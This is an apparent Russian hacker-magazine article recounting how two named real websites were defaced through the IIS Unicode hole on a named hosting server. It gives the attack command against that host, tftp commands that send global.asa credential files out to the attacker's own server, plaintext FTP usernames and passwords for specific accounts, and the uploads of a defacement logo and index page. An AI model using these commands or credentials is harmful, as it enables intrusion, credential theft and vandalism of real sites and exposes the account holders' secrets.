Привет Перцы!

Сегодня я вам расскажу
как был сделан deface на http://www.novellconsulting.com
и http://nextage.co.uk.
Все уже умненькие и знают что такое IIS unicode
и с чем его едят... Прикол в том ,что когда
вывесили на xakep`e результат deface все вскричали , что быыыыыы!!! старая дыра...
Ну да ладно, теперь подробнее о "старой
дыре". И первый и второй сайт в реале
хостятся через http://aerohost.com,
который работает под "всеми нами любимой"
WIN2000/IIS5.0. Последний дыряв юникодно-безбожно,
но на этом дырки кончаются? Нет дорогой друг,
никак нет.

Если ты потелнетишься
на этот чудо-сервак на 21,25,139,1433 порты, то у
тебя появится много интересных мыслей
помимо UniCodE (веб сервак в данном случае не
имеет прав на запись в каталоги юзерей, но
имеет права на exec). Во-первых, в c:\mssql7\ стоит,
понятно что:)), - MSSQL7 (который позволяет тебе
получить interactive shell при наличии логина и
пассы локального юзверя).

Oki Oki Oki. Как получить
пассу?

Дубль №1 - ЮЗАЕМ ЗАНК и
LinSQL7!

../iis-zank -t aerohost.com -i

В каталогe c:\users\wrachel
есть клевый файл global.asa, в котором и хранится
имя юзверя и пасса. Далее tftp my_tftp_server PUT 
c:\users\wrachel\global.asa Получив файло, мы теперь
можем шарахнуть LINSQL7 (прилагается)
по
серваку и делать свои делишки с правами SQL
сервака.

Дубль №2 - Получаем 
доступ к ftp

В каталогах c:\users\rnovell
& c:\users\nextage тот же global.asa содержит данные ftp
аккаунтов

tftp my_tftp_server PUT
c:\users\rnovell\global.asa & tftp my_tftp_server PUT
c:\users\nextage\global.asa

Далее ftp aerohost.com

login: rnovell
passwd: cnt134
put real.gif (наше лого)
put default.htm (наш IndeX файл)
quit

ftp aerohost.com
login: nextage
passwd: oakbridge
put real.gif (наше лого)
put default.htm (наш IndeX файл)
quit

Вот и все...

Список юзеров

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии